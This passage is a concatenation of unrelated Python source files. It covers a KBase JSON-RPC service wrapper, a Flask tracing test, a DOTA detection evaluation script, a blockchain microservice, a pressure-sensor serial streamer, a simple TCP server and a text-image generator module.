def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'kb_stringtie'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_kb_stringtie.run_stringtie_app,
name='kb_stringtie.run_stringtie_app',
types=[dict])
self.method_authentication['kb_stringtie.run_stringtie_app'] = 'required' # noqa
self.rpc_service.add(impl_kb_stringtie.status,
name='kb_stringtie.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'kb_stringtie ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception, e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print 'Request method was %s\n' % environ['REQUEST_METHOD']
# print 'Environment dictionary is:\n%s\n' % pprint.pformat(environ)
# print 'Request body was: %s' % request_body
# print 'Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result)
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
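        # Example: on a host five and a half hours ahead of UTC, delta is about
        # +5:30 (roughly 19800 seconds), so divmod(...) yields hh=5, mm=30 and
        # the returned string ends in '+5:30'.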
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run using the single-threaded Python BaseHTTP server listening
# on port 9999 (the default), execute this file directly
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print "Monkeypatching std libraries for async"
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
    By default, starts the server on localhost on a system-assigned port
    in the main thread. Execution of the main thread will stay in the server
    main loop until interrupted. To run the server in a separate process, and
    thus allow the stop_server method to be called, set newprocess = True. This
    also allows the port number to be returned.'''
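    # Illustrative usage (the client-side steps are an assumption):
    #     port = start_server(newprocess=True)   # returns the bound port
    #     ... send JSON-RPC requests to http://localhost:<port> ...
    #     stop_server()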
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print "Listening on port %s" % port
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print "Host set to %s" % host
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print "Listening on port %s" % port
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
consumer.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import requests
from skywalking.decorators import runnable
if __name__ == '__main__':
from flask import Flask, jsonify
app = Flask(__name__)
@app.route('/users', methods=['POST', 'GET'])
def application():
from skywalking.trace.context import get_context
get_context().put_correlation('correlation', 'correlation')
@runnable(op='/test')
def post():
requests.post('http://provider:9091/users')
from threading import Thread
t = Thread(target=post)
t.start()
res = requests.post('http://provider:9091/users')
t.join()
return jsonify(res.json())
PORT = 9090
app.run(host='0.0.0.0', port=PORT, debug=True)
|
feature_extract_csl.py
|
# -*- coding:utf-8 -*-
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import os
import sys
import tensorflow as tf
import cv2
import numpy as np
import math
from tqdm import tqdm
import argparse
from multiprocessing import Queue, Process
sys.path.append("../")
from libs.networks import build_whole_network_csl_tsne
from help_utils import tools
from libs.label_name_dict.label_dict import *
from libs.box_utils import draw_box_in_img
from libs.box_utils.coordinate_convert import forward_convert, backward_convert, coordinate_present_convert
from libs.box_utils import nms_rotate
from libs.box_utils.rotate_polygon_nms import rotate_gpu_nms
def worker(gpu_id, images, det_net, args, result_queue):
os.environ["CUDA_VISIBLE_DEVICES"] = str(gpu_id)
# 1. preprocess img
img_plac = tf.placeholder(dtype=tf.uint8, shape=[None, None, 3]) # is RGB. not BGR
img_batch = tf.cast(img_plac, tf.float32)
if cfgs.NET_NAME in ['resnet152_v1d', 'resnet101_v1d', 'resnet50_v1d']:
img_batch = (img_batch / 255 - tf.constant(cfgs.PIXEL_MEAN_)) / tf.constant(cfgs.PIXEL_STD)
else:
img_batch = img_batch - tf.constant(cfgs.PIXEL_MEAN)
img_batch = tf.expand_dims(img_batch, axis=0)
detection_boxes, detection_scores, detection_category, detection_boxes_angle, detection_boxes_angle_logits = det_net.build_whole_detection_network(
input_img_batch=img_batch,
gtboxes_batch_h=None,
gtboxes_batch_r=None,
gt_smooth_label=None)
init_op = tf.group(
tf.global_variables_initializer(),
tf.local_variables_initializer()
)
restorer, restore_ckpt = det_net.get_restorer()
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
with tf.Session(config=config) as sess:
sess.run(init_op)
        if restorer is not None:
restorer.restore(sess, restore_ckpt)
print('restore model %d ...' % gpu_id)
for img_path in images:
# if 'P0968' not in img_path:
# continue
img = cv2.imread(img_path)
box_res_rotate = []
label_res_rotate = []
score_res_rotate = []
logits_res_rotate = []
imgH = img.shape[0]
imgW = img.shape[1]
img_short_side_len_list = cfgs.IMG_SHORT_SIDE_LEN if args.multi_scale else [cfgs.IMG_SHORT_SIDE_LEN]
if imgH < args.h_len:
temp = np.zeros([args.h_len, imgW, 3], np.float32)
temp[0:imgH, :, :] = img
img = temp
imgH = args.h_len
if imgW < args.w_len:
temp = np.zeros([imgH, args.w_len, 3], np.float32)
temp[:, 0:imgW, :] = img
img = temp
imgW = args.w_len
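            # The image is scanned with overlapping h_len x w_len windows.
            # For example, with imgH=1200, h_len=600 and h_overlap=150 the row
            # starts are hh = 0, 450, 900; the last window no longer fits, so it
            # is shifted to hh_ = 600, giving crops at rows 0-600, 450-1050 and
            # 600-1200.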
for hh in range(0, imgH, args.h_len - args.h_overlap):
if imgH - hh - 1 < args.h_len:
hh_ = imgH - args.h_len
else:
hh_ = hh
for ww in range(0, imgW, args.w_len - args.w_overlap):
if imgW - ww - 1 < args.w_len:
ww_ = imgW - args.w_len
else:
ww_ = ww
src_img = img[hh_:(hh_ + args.h_len), ww_:(ww_ + args.w_len), :]
for short_size in img_short_side_len_list:
max_len = cfgs.IMG_MAX_LENGTH
if args.h_len < args.w_len:
new_h, new_w = short_size, min(int(short_size * float(args.w_len) / args.h_len), max_len)
else:
new_h, new_w = min(int(short_size * float(args.h_len) / args.w_len), max_len), short_size
img_resize = cv2.resize(src_img, (new_w, new_h))
resized_img, det_boxes_r_, det_scores_r_, det_category_r_, det_angle_logits_ = \
sess.run(
[img_batch, detection_boxes_angle, detection_scores, detection_category, detection_boxes_angle_logits],
feed_dict={img_plac: img_resize[:, :, ::-1]}
)
resized_h, resized_w = resized_img.shape[1], resized_img.shape[2]
src_h, src_w = src_img.shape[0], src_img.shape[1]
if len(det_boxes_r_) > 0:
det_boxes_r_ = forward_convert(det_boxes_r_, False)
det_boxes_r_[:, 0::2] *= (src_w / resized_w)
det_boxes_r_[:, 1::2] *= (src_h / resized_h)
# det_boxes_r_ = backward_convert(det_boxes_r_, False)
for ii in range(len(det_boxes_r_)):
box_rotate = det_boxes_r_[ii]
box_rotate[0::2] = box_rotate[0::2] + ww_
box_rotate[1::2] = box_rotate[1::2] + hh_
box_res_rotate.append(box_rotate)
label_res_rotate.append(det_category_r_[ii])
score_res_rotate.append(det_scores_r_[ii])
logits_res_rotate.append(det_angle_logits_[ii])
box_res_rotate = np.array(box_res_rotate)
label_res_rotate = np.array(label_res_rotate)
score_res_rotate = np.array(score_res_rotate)
logits_res_rotate = np.array(logits_res_rotate)
box_res_rotate_ = []
label_res_rotate_ = []
score_res_rotate_ = []
logits_res_rotate_ = []
threshold = {'roundabout': 0.1, 'tennis-court': 0.3, 'swimming-pool': 0.1, 'storage-tank': 0.2,
'soccer-ball-field': 0.3, 'small-vehicle': 0.2, 'ship': 0.2, 'plane': 0.3,
'large-vehicle': 0.1, 'helicopter': 0.2, 'harbor': 0.0001, 'ground-track-field': 0.3,
'bridge': 0.0001, 'basketball-court': 0.3, 'baseball-diamond': 0.3}
for sub_class in range(1, cfgs.CLASS_NUM + 1):
index = np.where(label_res_rotate == sub_class)[0]
if len(index) == 0:
continue
tmp_boxes_r = box_res_rotate[index]
tmp_label_r = label_res_rotate[index]
tmp_score_r = score_res_rotate[index]
tmp_logits_r = logits_res_rotate[index]
tmp_boxes_r_ = backward_convert(tmp_boxes_r, False)
try:
inx = nms_rotate.nms_rotate_cpu(boxes=np.array(tmp_boxes_r_),
scores=np.array(tmp_score_r),
iou_threshold=threshold[LABEL_NAME_MAP[sub_class]],
max_output_size=5000)
except:
tmp_boxes_r_ = np.array(tmp_boxes_r_)
tmp = np.zeros([tmp_boxes_r_.shape[0], tmp_boxes_r_.shape[1] + 1])
tmp[:, 0:-1] = tmp_boxes_r_
tmp[:, -1] = np.array(tmp_score_r)
# Note: the IoU of two same rectangles is 0, which is calculated by rotate_gpu_nms
jitter = np.zeros([tmp_boxes_r_.shape[0], tmp_boxes_r_.shape[1] + 1])
jitter[:, 0] += np.random.rand(tmp_boxes_r_.shape[0], ) / 1000
inx = rotate_gpu_nms(np.array(tmp, np.float32) + np.array(jitter, np.float32),
float(threshold[LABEL_NAME_MAP[sub_class]]), 0)
box_res_rotate_.extend(np.array(tmp_boxes_r)[inx])
score_res_rotate_.extend(np.array(tmp_score_r)[inx])
label_res_rotate_.extend(np.array(tmp_label_r)[inx])
logits_res_rotate_.extend(np.array(tmp_logits_r)[inx])
result_dict = {'boxes': np.array(box_res_rotate_), 'scores': np.array(score_res_rotate_),
'labels': np.array(label_res_rotate_), 'logits': np.array(logits_res_rotate_),
'image_id': img_path}
result_queue.put_nowait(result_dict)
def test_dota(det_net, real_test_img_list, args, txt_name):
save_path = os.path.join('./test_dota', cfgs.VERSION)
nr_records = len(real_test_img_list)
pbar = tqdm(total=nr_records)
gpu_num = len(args.gpus.strip().split(','))
nr_image = math.ceil(nr_records / gpu_num)
result_queue = Queue(500)
procs = []
for i, gpu_id in enumerate(args.gpus.strip().split(',')):
start = i * nr_image
end = min(start + nr_image, nr_records)
split_records = real_test_img_list[start:end]
proc = Process(target=worker, args=(int(gpu_id), split_records, det_net, args, result_queue))
print('process:%d, start:%d, end:%d' % (i, start, end))
proc.start()
procs.append(proc)
log_dir = './csl_log/{}'.format(cfgs.VERSION)
tools.mkdir(log_dir)
fw_tsv = open(os.path.join(log_dir, 'csl_meta.tsv'), 'w')
# fw_tsv.write("Label\n")
final_logits = []
for i in range(nr_records):
res = result_queue.get()
if args.show_box:
nake_name = res['image_id'].split('/')[-1]
tools.mkdir(os.path.join(save_path, 'dota_img_vis'))
draw_path = os.path.join(save_path, 'dota_img_vis', nake_name)
draw_img = np.array(cv2.imread(res['image_id']), np.float32)
detected_boxes = backward_convert(res['boxes'], with_label=False)
detected_indices = res['scores'] >= cfgs.VIS_SCORE
detected_scores = res['scores'][detected_indices]
detected_boxes = detected_boxes[detected_indices]
detected_categories = res['labels'][detected_indices]
final_detections = draw_box_in_img.draw_boxes_with_label_and_scores(draw_img,
boxes=detected_boxes,
labels=detected_categories,
scores=detected_scores,
method=1,
head=np.ones_like(detected_scores) * -1,
is_csl=True,
in_graph=False)
cv2.imwrite(draw_path, final_detections)
else:
detected_indices = res['scores'] >= cfgs.VIS_SCORE
res['scores'] = res['scores'][detected_indices]
res['boxes'] = res['boxes'][detected_indices]
res['labels'] = res['labels'][detected_indices]
rboxes = backward_convert(res['boxes'], with_label=False)
rboxes = coordinate_present_convert(rboxes, -1, False)
rlogits = res['logits'][detected_indices]
for ii, rb in enumerate(rboxes):
fw_tsv.write("%d\n" % (int(rb[-1])))
final_logits.append(rlogits[ii])
fw = open(txt_name, 'a+')
fw.write('{}\n'.format(res['image_id'].split('/')[-1]))
fw.close()
pbar.set_description("Test image %s" % res['image_id'].split('/')[-1])
pbar.update(1)
for p in procs:
p.join()
fw_tsv.close()
final_logits = np.array(final_logits)
np.save(os.path.join(log_dir, "final_logits.npy"), final_logits)
def eval(num_imgs, args):
txt_name = '{}.txt'.format(cfgs.VERSION)
if not args.show_box:
if not os.path.exists(txt_name):
fw = open(txt_name, 'w')
fw.close()
fr = open(txt_name, 'r')
img_filter = fr.readlines()
print('****************************'*3)
print('Already tested imgs:', img_filter)
print('****************************'*3)
fr.close()
test_imgname_list = [os.path.join(args.test_dir, img_name) for img_name in os.listdir(args.test_dir)
if img_name.endswith(('.jpg', '.png', '.jpeg', '.tif', '.tiff')) and
(img_name + '\n' not in img_filter)]
else:
test_imgname_list = [os.path.join(args.test_dir, img_name) for img_name in os.listdir(args.test_dir)
if img_name.endswith(('.jpg', '.png', '.jpeg', '.tif', '.tiff'))]
assert len(test_imgname_list) != 0, 'test_dir has no imgs there.' \
                                            ' Note that only image formats (.jpg, .jpeg, .png, .tif, .tiff) are supported.'
if num_imgs == np.inf:
real_test_img_list = test_imgname_list
else:
real_test_img_list = test_imgname_list[: num_imgs]
csl = build_whole_network_csl_tsne.DetectionNetwork(base_network_name=cfgs.NET_NAME,
is_training=False)
test_dota(det_net=csl, real_test_img_list=real_test_img_list, args=args, txt_name=txt_name)
if not args.show_box:
os.remove(txt_name)
def parse_args():
    parser = argparse.ArgumentParser('evaluate the result with the Pascal2007 standard')
parser.add_argument('--test_dir', dest='test_dir',
help='evaluate imgs dir ',
default='/data/DOTA/test/images/', type=str)
parser.add_argument('--gpus', dest='gpus',
help='gpu id',
default='0,1,2,3,4,5,6,7', type=str)
parser.add_argument('--eval_num', dest='eval_num',
help='the num of eval imgs',
default=np.inf, type=int)
parser.add_argument('--show_box', '-s', default=False,
action='store_true')
parser.add_argument('--multi_scale', '-ms', default=False,
action='store_true')
parser.add_argument('--h_len', dest='h_len',
help='image height',
default=600, type=int)
parser.add_argument('--w_len', dest='w_len',
help='image width',
default=600, type=int)
parser.add_argument('--h_overlap', dest='h_overlap',
help='height overlap',
default=150, type=int)
parser.add_argument('--w_overlap', dest='w_overlap',
help='width overlap',
default=150, type=int)
args = parser.parse_args()
return args
if __name__ == '__main__':
args = parse_args()
print(20*"--")
print(args)
print(20*"--")
eval(args.eval_num,
args=args)
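# Usage sketch (the script file name below is a placeholder; the flags are the
# ones defined in parse_args() above):
#
#   python eval_dota.py --test_dir /data/DOTA/test/images/ --gpus 0,1 --eval_num 100
#   python eval_dota.py --test_dir /data/DOTA/test/images/ --gpus 0 -s   # also draw detections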
|
block_microservice.py
|
from multiprocessing import Process, Queue
import json
from time import time
from flask import Flask, jsonify, request
import requests
# Data Layer
def _load_ready_transactions():
with open('transactions_ready.json', 'r') as infile:
return json.load(infile)["transactions"]
# Business Layer
def _create_block(transactions=None):
if transactions is None:
transactions = []
block = {
'timestamp': time(),
'transactions': transactions,
}
return block
# API Layer
def _worker_main(queue_: Queue):
while True:
print("The Queue has {} items to be processed:".format(queue_.qsize()))
queue_.get(True)
transactions = _load_ready_transactions()
block = _create_block(transactions)
requests.post('http://localhost:5003/mine', json={"block":block})
print("Background process has finished processing", transactions)
app = Flask(__name__)
@app.route('/block', methods=['GET'])
def mine():
queue.put(1)
response = {
'message': "New Block Forged",
}
return jsonify(response), 200
@app.route('/genesis', methods=['GET'])
def create_genesis_block():
try:
# The persisted blocks file doubles as the marker that the genesis block was
# already created. The file name is an assumption here and should match whatever
# store_not_minned_blocks() -- assumed to be defined in the data layer of this
# service -- writes to.
with open('blocks_not_minned.json', 'r') as infile:
json.load(infile)
response = {'message': "Genesis Block Already Created"}
except FileNotFoundError:
genesis_block = _create_block()
response = {'message': "Genesis Block Created"}
store_not_minned_blocks({"blocks": [genesis_block]})
return jsonify(response), 200
if __name__ == "__main__":
queue = Queue()
p = Process(target=_worker_main, args=(queue,))
p.start()
app.run(port=5002)
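# Example interaction (sketch) once this service is running on port 5002. The
# mining service on port 5003 that _worker_main() POSTs to is assumed to run
# separately.
#
#   curl http://localhost:5002/genesis   # create and persist the genesis block
#   curl http://localhost:5002/block     # enqueue a block to be assembled and mined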
|
DPS310_stream.py
|
from __future__ import print_function
import sys
import time
import threading
import serial
import atexit
import signal
import Queue
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
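# Serial protocol sketch (inferred from the class below): the firmware starts
# streaming when it receives 'b\n' and stops on 'e\n'; each streamed line is a
# comma-separated list of pressure readings in Pa, one value per sensor, e.g.
# "98342.10,98340.73,...".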
class PressureStreamer(serial.Serial):
def __init__(self,param):
self.param = param
port_param = {k:self.param[k] for k in ('baudrate', 'timeout')}
super(PressureStreamer,self).__init__(self.param['port'],**port_param)
self.lock = threading.Lock()
self.daq_thread = threading.Thread(target=self.read_data)
self.daq_thread.daemon = True
self.daq_queue = Queue.Queue()
signal.signal(signal.SIGINT,self.sigint_handler)
atexit.register(self.atexit)
while self.in_waiting > 0:
value = self.read()
self.running = False
self.t_list = []
self.data_list = []
self.live_plot = LivePlot(self.param)
def atexit(self):
print('quitting')
with self.lock:
self.write('e\n')
self.running = False
def sigint_handler(self,signum,frame):
with self.lock:
self.running = False
exit(0)
def read_data(self):
with self.lock:
running = self.running
start_t = self.start_t
while running:
with self.lock:
line = self.readline()
running = self.running
if line:
line = line.strip()
line = line.split(',')
values = [float(item) for item in line]
elapsed_t = time.time() - start_t
data_dict = {'elapsed_t': elapsed_t, 'values': values}
self.daq_queue.put(data_dict)
def run(self):
data_count = 0
# Start data stream
self.running = True
with self.lock:
self.write('b\n')
self.start_t = time.time()
self.daq_thread.start()
with open(self.param['datafile'],'w') as fid:
while True:
print('queue size: {} '.format(self.daq_queue.qsize()))
new_data = False
while True:
try:
data_dict = self.daq_queue.get_nowait()
new_data = True
except Queue.Empty:
break
# Write data to file
fid.write('{:0.3f} '.format(data_dict['elapsed_t']))
for i, value in enumerate(data_dict['values']):
fid.write('{:0.3f}'.format(value))
if i < len(data_dict['values']) -1:
fid.write(' ')
fid.write('\n')
# Append new items to time and data lists
data_count += 1
self.t_list.append(data_dict['elapsed_t'])
if not self.data_list:
self.data_list = [[value] for value in data_dict['values']]
else:
for value_list, value in zip(self.data_list, data_dict['values']):
value_list.append(value)
# Remove data older than t - t_window from t_list and data_list
if new_data and len(self.t_list) > 2:
while self.t_list[-1] - self.t_list[0] > self.param['t_window']:
self.t_list.pop(0)
for value_list in self.data_list:
value_list.pop(0)
self.live_plot.update(self.t_list, self.data_list)
class LivePlot(object):
def __init__(self, param):
self.param = param
self.p_range = self.param['p_range']
self.line_list = []
self.setup_plots()
def setup_plots(self):
plt.ion()
self.fig = plt.figure(1,figsize=self.param['figsize'])
self.ax = plt.subplot(111)
plt.grid('on')
plt.xlabel('t (sec)')
plt.ylabel('P (Pa)')
label_list = []
for ind in self.param['plot_list']:
line, = plt.plot([0.0,self.param['t_window']], [0,0])
self.line_list.append(line)
self.ax.set_xlim(0.0,self.param['t_window'])
self.ax.set_ylim(self.p_range[0],self.p_range[1])
line.set_xdata([])
line.set_ydata([])
label_list.append('sens {}'.format(ind))
plt.figlegend(self.line_list,label_list,'upper right')
def update(self, t_list, data_list):
for i, ind in enumerate(self.param['plot_list']):
line = self.line_list[i]
values = data_list[ind]
line.set_xdata(t_list)
line.set_ydata(values)
self.ax.set_xlim(min(t_list),max(self.param['t_window'],max(t_list)))
self.fig.canvas.flush_events()
plt.pause(0.02)
# ---------------------------------------------------------------------------------------
if __name__ == '__main__':
param = {
'port' : '/dev/ttyACM0',
'baudrate' : 115200,
'timeout' : 0.1,
'figsize' : (20,5),
't_window' : 5.0,
'p_range' : (98300, 98400),
'plot_list' : [0,26],
'datafile' : 'data.txt',
}
streamer = PressureStreamer(param)
streamer.run()
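# Resulting data.txt format (sketch): one row per sample -- elapsed time in
# seconds followed by one space-separated pressure value per sensor, e.g.
#   0.012 98342.10 98340.73 ...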
|
tcp_server.py
|
import socket
import threading
bind_ip = "0.0.0.0"
bind_port = 9999
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((bind_ip,bind_port))
server.listen(5)
print "[*] Listening on %s:%d" % (bind_ip,bind_port)
# This is our client-handling thread. handle_client() performs a recv() and then sends a simple message back to the client.
def handle_client(client_socket):
# print out what the client sends
request = client_socket.recv(1024)
print "[*] Received: %s" % request
# send back a packet
client_socket.send("ACK!")
client_socket.close()
while True:
client,addr = server.accept()
print "[*] Accepted connection from: %s:%d" % (addr[0],addr[1])
# spin up our client thread to handle incoming data
client_handler = threading.Thread(target=handle_client,args=(client,))
client_handler.start()
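# Example client (sketch, Python 2 to match the server above): connect to the
# listener on port 9999, send some bytes and print the "ACK!" reply.
#
#   import socket
#   client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#   client.connect(("127.0.0.1", 9999))
#   client.send("GET / HTTP/1.1\r\nHost: localhost\r\n\r\n")
#   print client.recv(4096)
#   client.close()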
|
gen.py
|
"""
SynthTIGER
Copyright (c) 2021-present NAVER Corp.
MIT license
"""
import os
import random
import sys
import traceback
from multiprocessing import Process, Queue
import numpy as np
import yaml
def read_template(path, name, config=None):
path = os.path.abspath(path)
root = os.path.dirname(path)
module = os.path.splitext(os.path.basename(path))[0]
sys.path.append(root)
template = getattr(__import__(module), name)(config)
sys.path.remove(root)
del sys.modules[module]
return template
def read_config(path):
with open(path, "r", encoding="utf-8") as fp:
config = yaml.load(fp, Loader=yaml.SafeLoader)
return config
def generator(path, name, config=None, worker=0, verbose=False):
if worker > 0:
queue = Queue(maxsize=1024)
for _ in range(worker):
_run(_worker, (path, name, config, queue, verbose))
while True:
data = queue.get()
yield data
else:
template = read_template(path, name, config)
while True:
data = _generate(template, verbose)
yield data
def _run(func, args):
proc = Process(target=func, args=args)
proc.daemon = True
proc.start()
return proc
def _worker(path, name, config, queue, verbose):
random.seed()
np.random.seed()
template = read_template(path, name, config)
while True:
data = _generate(template, verbose)
queue.put(data)
def _generate(template, verbose):
while True:
try:
data = template.generate()
except:
if verbose:
print(traceback.format_exc())
continue
return data
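# Usage sketch (the template path, class name and config file below are
# placeholders, not part of this module): load a YAML config, start a
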